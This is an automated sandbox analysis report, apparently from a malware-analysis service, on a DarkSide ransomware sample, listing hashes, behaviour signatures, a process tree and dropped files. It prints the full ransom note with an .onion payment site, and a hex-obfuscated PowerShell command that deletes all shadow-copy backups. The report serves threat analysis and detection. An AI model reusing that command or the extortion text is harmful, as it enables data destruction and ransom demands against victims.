Overview

overview

10

Static

static

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

7

Resubmissions

31/03/2025, 00:22

250331-apdw1ssjs8 10

28/03/2025, 22:52

250328-2tfd7avl15 10

25/03/2025, 14:57

250325-sb3mbsxxht 10

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 14:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RansomwareSamples/DarkSide_01_05_2021_30KB.exe

  • Size

    30KB

  • MD5

    f00aded4c16c0e8c3b5adfc23d19c609

  • SHA1

    86ca4973a98072c32db97c9433c16d405e4154ac

  • SHA256

    4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a

  • SHA512

    a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf

  • SSDEEP

    768:lXnIczxCbTRNl71wHpZQgYI1TQPB3aYJEOW:hIMxCXd1+pZQgYIxk3vJE

Score
10/10
darksidecredential_accessdiscoveryexecutionransomwarespywarestealerupx

Malware Config

Extracted

Path

C:\Users\Admin\README.28ea263b.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Darkside family
    darkside
  • Renames multiple (181) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Control Panel 1 IoCs
    defense_evasion
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    defense_evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe
    "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2216

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    aeb9e6dc0bac9b237489568abaf69248

    SHA1

    84d54400de9e46690dead284403d8fccdc3e48e1

    SHA256

    2b8178884d739fa567469d9e681861bcbf024c1b0e94060a637763e30486f318

    SHA512

    5ddc3f4848b11b9c3825c95985e0555417e65c536bcebafa3318c55454c22169622f2a43e0dce14a1055702cf79e95c8a82f848622f37a7f4abf7ee93f6ecd6f

    Download Submit

  • C:\Users\Admin\README.28ea263b.TXT
    Filesize

    1KB

    MD5

    f418a249405444da33cc73b402a26306

    SHA1

    1a6c493e74036f93f0dae4b65e6c543c213ce418

    SHA256

    b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09

    SHA512

    b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

    Download Submit

  • memory/2672-0-0x0000000001270000-0x0000000001287000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2672-256-0x0000000001270000-0x0000000001287000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2672-252-0x0000000001270000-0x0000000001287000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2672-29-0x0000000001270000-0x0000000001287000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2888-25-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-27-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-26-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-28-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-24-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-21-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2888-23-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2888-22-0x0000000002960000-0x0000000002968000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2888-20-0x000007FEF641E000-0x000007FEF641F000-memory.dmp

    Filesize

    4KB

    Download